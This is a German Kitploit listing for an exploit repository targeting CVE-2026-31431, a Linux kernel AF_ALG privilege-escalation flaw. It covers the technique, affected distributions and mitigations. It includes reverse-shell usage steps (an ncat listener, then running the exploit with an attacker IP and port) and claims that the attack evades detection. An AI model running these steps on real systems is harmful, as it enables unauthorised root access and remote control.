Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-31431-RCE-Exploit — # Lokaler Privilege-Escalation-Exploit für CVE-2026-31431 Lokaler Privilege-Escalation-Exploit für CVE-2026-31431, einen Logikfehler im Linux-Kernel-AF_ALG, der es nicht privilegierten Benutzern ermöglicht, 4 Bytes in den Page Cache zu schreiben und Root-Rechte zu erlangen. Enthält PoC-Skript und Hinweise zur Abschwächung. | Kitploit
Tools/GitHubGitHub/m4xsec/cve-2026-31431-rce-exploit
Privilege EscalationExploit-FrameworksSchwachstellenanalyseExploitationRed TeamingContainer-AusbruchBinary-Exploitation
GitHubm4xsec/cve-2026-31431-rce-exploit

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

# Lokaler Privilege-Escalation-Exploit für CVE-2026-31431 Lokaler Privilege-Escalation-Exploit für CVE-2026-31431, einen Logikfehler im Linux-Kernel-AF_ALG, der es nicht privilegierten Benutzern ermöglicht, 4 Bytes in den Page Cache zu schreiben und Root-Rechte zu erlangen. Enthält PoC-Skript und Hinweise zur Abschwächung.

CVE-2026-31431-RCE-Exploit

Repository anzeigen
72vor 3 MonatenNoch nicht geprüft
Teilen

🔴 CVE-2026-31431 — „Copy Fail"

Ein 9 Jahre alter Linux-Kernel-Logikfehler, der in Sekunden Root-Rechte gewährt

CVE CVSS Kernel Since


Übersicht

Copy Fail ist eine schwerwiegende lokale Privilegieneskalations-Schwachstelle (LPE) im kryptografischen Subsystem des Linux-Kernels (algif_aead). Entdeckt und veröffentlicht von Theori (über ihr KI-gestütztes Schwachstellenforschungs-Tool Xint Code) am 29. April 2026, ermöglicht der Fehler jedem nicht-privilegierten lokalen Benutzer, 4 kontrollierte Bytes in den Page Cache einer beliebigen lesbaren Datei zu schreiben — und dies auszunutzen, um auf praktisch jeder großen Linux-Distribution, die seit 2017 ausgeliefert wurde, Root-Rechte zu erlangen.

Ein funktionierender Proof-of-Concept-Exploit umfasst nur ~732 Bytes Python.


Ausnutzung

  1. Ncat-Listener starten
root@kitploit:~
sudo ncat -lvnp PORT
  1. Exploit auf dem Zielsystem ausführen
root@kitploit:~
# Mit Python-Skript
python3 CVE-2026-31431-Exploit.py IP PORT

# Kompilierte Binärdatei
chmod +x CVE-2026-31431-Exploit
./CVE-2026-31431-Exploit IP PORT

🧬 Technische Zusammenfassung

So funktioniert der Exploit (4 Schritte)

  1. Öffnen Sie einen AF_ALG-Socket und binden Sie ihn an authencesn(hmac(sha256),cbc(aes))
  2. Splices Sie die Seiten einer lesbaren setuid-Binärdatei in den Socket
  3. Der AEAD-Scratch-Schreibvorgang des Kernels überschreibt 4 Bytes im Page Cache dieser Binärdatei
  4. Ausführen der nun korrupten setuid-Binärdatei → Root-Shell

Warum es gefährlich ist

  • Kein Race-Fenster — deterministisch, funktioniert jedes Mal
  • Kein Kernel-Offset / KASLR-Bypass nötig
  • Derselbe Exploit funktioniert über Distributionen hinweg — Ubuntu, RHEL, Amazon Linux, SUSE, Rocky usw.
  • Container-Escape — der Page Cache wird geteilt; ein Schreibzugriff aus einem Container heraus wirkt sich auf den Host aus
  • Keine Änderung auf dem Datenträger — Dateiintegritätsmonitore (AIDE, OSSEC usw.) werden es nicht erkennen
  • Keine forensische Spur auf dem Datenträger

🎯 Betroffene Versionen

Bestätigte verwundbare Distributionen

  • Ubuntu 24.04 LTS
  • Amazon Linux 2023
  • RHEL 10.1
  • SUSE 16
  • Rocky Linux 9.7

Im Wesentlichen ist jede große Linux-Distribution, die seit 2017 veröffentlicht wurde, betroffen.


🛡️ Gegenmaßnahmen

1. Patch (empfohlen)

Aktualisieren Sie Ihren Kernel auf eine Version, die den Fix-Commit fafe0fa2995a enthält. Die meisten großen Distributionen haben aktualisierte Kernel-Pakete veröffentlicht oder veröffentlichen diese gerade.

2. Temporäre Workarounds

Falls Sie nicht sofort patchen können:

  • Blockieren Sie die AF_ALG-Socket-Erstellung über eine seccomp-Richtlinie
  • Setzen Sie das algif_aead-Modul auf die Blacklist:
    root@kitploit:~
    echo "blacklist algif_aead" | sudo tee /etc/modprobe.d/disable-algif-aead.conf
    sudo modprobe -r algif_aead 2>/dev/null
    

⚠️ Haftungsausschluss

Dieses Repository dient ausschließlich Bildungs- und Verteidigungszwecken. Die hier enthaltenen Informationen sollen Sicherheitsteams dabei helfen, CVE-2026-31431 zu verstehen, zu erkennen und zu entschärfen. Befolgen Sie stets verantwortungsvolle Offenlegungspraktiken und geltende Gesetze.


⭐ Markieren Sie dieses Repository mit einem Stern, um über Patches und Erkennungsleitfäden auf dem Laufenden zu bleiben.

Tool herunterladen
FeldDetail
CVE-IDCVE-2026-31431
CVSS-Score7.8 (HOCH)
TypLokale Privilegieneskalation (LPE)
Komponentealgif_aead — AF_ALG-Benutzerraum-Krypto-Schnittstelle des Linux-Kernels
GrundursacheLogikfehler in der authencesn-AEAD-Vorlage; eine In-Place-Optimierung (Commit 72548b093ee3, Aug. 2017) führt dazu, dass Page-Cache-Seiten in der beschreibbaren Ziel-Scatterlist des Kernels erscheinen
Primitive4-Byte-kontrollierter Schreibzugriff in den Page Cache einer beliebigen lesbaren Datei
Exploit-MechanismusAF_ALG-Socket → splice() → Page-Cache-Korruption einer setuid-Binärdatei → Root
Race Condition?❌ Keine — geradliniger Logikfehler, 100 % zuverlässig
Kernel-Offset nötig?❌ Nein
Fix-Commitfafe0fa2995a (macht die Optimierung von 2017 rückgängig)
BetroffenNicht betroffen
Linux-Kernel 4.14 bis 7.0-rcKernel vor 4.14 (vor dem Commit von Aug. 2017)
Alle 6.18.x vor 6.18.226.18.22+ (gepatcht)
Alle 6.19.x vor 6.19.126.19.12+ (gepatcht)